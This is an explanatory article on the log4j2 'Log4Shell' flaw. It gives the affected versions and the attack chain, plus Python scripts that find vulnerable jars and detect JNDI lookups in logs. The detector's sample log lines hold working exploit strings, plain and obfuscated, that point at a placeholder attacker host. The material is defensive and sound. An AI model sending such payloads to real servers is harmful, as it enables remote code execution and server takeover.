The vulnerability is regarded as very severe: it allows an attacker to gain complete control of the server and is easy to perform. The library is widely used, so many servers were affected. The list of responses from the organizations whose servers were impacted is available here.
The vulnerability is present in log4j2 versions 2.0 through 2.14.1. The fix is currently released as version 2.15.0.
The exploit can be reproduced if the server runs a vulnerable version of the library, exposes an endpoint over any protocol through which the exploit string can be sent, and has a log statement that logs the request containing that string.
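The first condition above is the one an operator can check on disk: which log4j-core jars are present and whether their version falls in the affected range. The script below is an added example, not code from the original page or from the Log4j project; it walks a directory tree, reads the version that log4j-core ships in its Maven `pom.properties`, compares it against the 2.0 to 2.14.1 range the text states, and also reports whether the `JndiLookup` class is still inside the jar. The sample jars it scans are constructed in a temporary directory so the example runs offline.

```python
import os
import tempfile
import zipfile
from typing import Iterator, Optional, Tuple

# Range stated in the text above: log4j-core 2.0 through 2.14.1 vulnerable, 2.15.0 carries the fix.
VULNERABLE_MIN = (2, 0, 0)
VULNERABLE_MAX = (2, 14, 1)
# Real entry names inside a log4j-core jar (Maven metadata and the lookup class behind the issue).
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(text: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); a '-beta9' style suffix is dropped and '2.0' pads to (2, 0, 0)."""
    core = text.strip().split("-")[0]
    parts = [int(p) for p in core.split(".") if p.isdigit()]
    while len(parts) < 3:
        parts.append(0)
    return parts[0], parts[1], parts[2]


def log4j_core_version(jar_path: str) -> Optional[str]:
    """Return the version from log4j-core's pom.properties, or None if this is not a log4j-core jar."""
    with zipfile.ZipFile(jar_path) as jar:
        if POM_PROPERTIES not in jar.namelist():
            return None
        for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
            key, sep, value = line.partition("=")
            if sep and key.strip() == "version":
                return value.strip()
    return None


def has_jndi_lookup(jar_path: str) -> bool:
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP_CLASS in jar.namelist()


def assess_jar(jar_path: str) -> dict:
    """Classify one jar: not log4j-core, or log4j-core with version, range verdict and JndiLookup presence."""
    version = log4j_core_version(jar_path)
    result = {"path": jar_path, "name": os.path.basename(jar_path), "log4j_core": version is not None}
    if version is None:
        return result
    result["version"] = version
    result["vulnerable_range"] = VULNERABLE_MIN <= parse_version(version) <= VULNERABLE_MAX
    result["jndi_lookup_present"] = has_jndi_lookup(jar_path)
    return result


def scan_tree(root: str) -> Iterator[dict]:
    """Walk a directory tree and assess every .jar found (nested jars inside wars/ears are not unpacked)."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith(".jar"):
                try:
                    yield assess_jar(os.path.join(dirpath, name))
                except zipfile.BadZipFile:
                    continue


def make_sample_jar(path: str, version: str, include_jndi_lookup: bool = True) -> str:
    """Constructed stand-in for a log4j-core jar: only the two entries the scanner inspects."""
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr(POM_PROPERTIES,
                     f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # class-file magic only, no real bytecode
    return path


def demo() -> list:
    """Build three constructed jars in a temp dir and return the scan results for them."""
    with tempfile.TemporaryDirectory() as root:
        make_sample_jar(os.path.join(root, "log4j-core-2.14.1.jar"), "2.14.1")
        make_sample_jar(os.path.join(root, "log4j-core-2.15.0.jar"), "2.15.0")
        os.makedirs(os.path.join(root, "lib"))
        make_sample_jar(os.path.join(root, "lib", "log4j-core-2.14.1-nojndi.jar"), "2.14.1",
                        include_jndi_lookup=False)
        return sorted(scan_tree(root), key=lambda r: r["name"])


if __name__ == "__main__":
    for r in demo():
        print(r)
```

The version check is the decisive signal; the `jndi_lookup_present` field is reported separately because removing `JndiLookup.class` from the jar was Apache's documented workaround for deployments that could not upgrade immediately, so a 2.14.1 jar without that class is in a different state from an untouched one. Jars bundled inside war or ear archives, and fat jars that shade log4j-core under a different path, are not unpacked here and need an extra layer of inspection.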
The attack is performed in the following way:
- A request containing the malicious string is sent from the attacker to the server;
- The server logs the payload, which contains a link to a server controlled by the attacker. For example:
- The vulnerable server makes a request to the attacker's server using the Java Naming and Directory Interface (JNDI) and receives a response that includes a link to a remote Java class file;
- The remote Java class file is loaded and executed by the server, which allows arbitrary code execution and gives the attacker full access to the server.
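The second step of the chain above, the server logging a payload that points at an attacker-controlled host, is also the point where the attack leaves a trace. The detector below is an added example, not code from the original page; it normalizes log4j lookup syntax (the `${lower:..}`, `${upper:..}` and `${..:-..}` forms that are used to hide the literal `jndi` keyword) and then reports every JNDI lookup with its protocol and target host. The access log lines it runs over are constructed for the example, with `attacker.example` as a placeholder host.

```python
import re
from typing import Dict, Iterable, List

# Lookup forms that can wrap a single character or word; collapsing them reveals the intended string.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")   # ${anything:-value} resolves to "value"
# After normalization, a JNDI lookup reads ${jndi:<scheme>://<host>...}; capture scheme and host.
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/}\s]+)", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Resolve nested lower/upper/default lookups inside-out until the text stops changing."""
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def scan_log(lines: Iterable[str]) -> List[Dict]:
    """Return one finding per JNDI lookup found in the (normalized) log lines."""
    findings = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        for match in _JNDI.finditer(normalized):
            findings.append({
                "line": number,
                "scheme": match.group(1).lower(),
                "host": match.group(2),
                "obfuscated": normalized != line,   # True when lookups had to be unwrapped first
                "raw": line,
            })
    return findings


# Constructed web-server access log lines; the User-Agent field is a typical place for the string
# to land, because many applications log it verbatim.
LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01] "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03] "GET / HTTP/1.1" 200 '
    '"${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.12 - - [10/Dec/2021:12:00:04] "GET /?q=${env:HOME} HTTP/1.1" 200 "curl/7.79"',
]


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        flag = "obfuscated" if finding["obfuscated"] else "plain"
        print(f'line {finding["line"]}: {finding["scheme"]}://{finding["host"]} ({flag})')
```

Two design points matter in practice. First, the detector works on the normalized text but reports the raw line, so an analyst sees exactly what the application logged. Second, the fourth sample line contains a lookup that is not JNDI and is deliberately not flagged; alerting on every `${` would drown the signal, whereas a JNDI lookup with an external host is almost never legitimate in request data. Searching web access logs alone is not sufficient, because the string can arrive over any protocol and any logged field, as the text notes; the same normalization should be applied to application logs.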
So, if you’re using Java software on your servers, it is crucial to get the vulnerability patched as soon as possible.